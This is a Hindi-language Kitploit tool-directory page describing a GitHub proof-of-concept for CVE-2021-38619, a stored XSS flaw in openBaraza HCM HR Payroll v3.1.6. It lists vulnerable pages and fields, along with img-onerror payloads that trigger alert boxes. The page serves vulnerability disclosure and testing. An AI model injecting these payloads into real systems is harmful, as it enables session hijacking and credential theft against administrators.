Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-38619 — CVE-2021-38619 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: openBaraza HCM HR Payroll v3.1.6 में अप्रमाणित संग्रहित XSS, क्रेडेंशियल चोरी और सत्र अपहरण के लिए पेलोड उदाहरणों के साथ। | Kitploit
उपकरण/GitHubGitHub/charlesbickel/cve-2021-38619
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcharlesbickel/cve-2021-38619

CVE-2021-38619

CVE-2021-38619 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: openBaraza HCM HR Payroll v3.1.6 में अप्रमाणित संग्रहित XSS, क्रेडेंशियल चोरी और सत्र अपहरण के लिए पेलोड उदाहरणों के साथ।

रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-38619 openBaraza HCM HR Payroll v.3.1.6 अप्रमाणित संग्रहीत XSS भेद्यता

openBaraza HCM v.3.1.6 उपयोगकर्ता-नियंत्रित इनपुट को ठीक से बेअसर नहीं करता है, इससे एक अप्रमाणित दूरस्थ हमलावर को कई पृष्ठों से एक प्रशासनिक उपयोगकर्ता के खिलाफ संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला करने की अनुमति मिल सकती है। यदि कोई हमलावर भेद्य पृष्ठों में मनमाना जावास्क्रिप्ट पेलोड इंजेक्ट करता है और वैध उपयोगकर्ता प्रभावित पृष्ठों पर जाने का प्रयास करते हैं, तो पेलोड निष्पादित हो जाएगा। इसके परिणामस्वरूप क्रेडेंशियल चोरी, सत्र अपहरण या पीड़ित को मैलवेयर वितरित करना हो सकता है।

खोजकर्ता श्रेय: Charles Bickel & Gideon Gray


भेद्य पृष्ठ: http://serverip:9090/hr/application.jsp

भेद्य टेक्स्टबॉक्स: first_name, surname, email

पेलोड्स:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('First');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('Surname');" />
  • [email protected]<img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

प्रभावित पृष्ठ: http://serverip:9090/hr/index.jsp?view=23:0

application.jsp


भेद्य पृष्ठ: http://serverip:9090/hr/subscription.jsp

भेद्य टेक्स्टबॉक्स: business_name, primary_contact, primary_email, confirm_email

पेलोड्स:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('business');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('contact');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

प्रभावित पृष्ठ: http://serverip:9090/hr/index.jsp?view=94:0

subscription.jsp

टूल डाउनलोड करें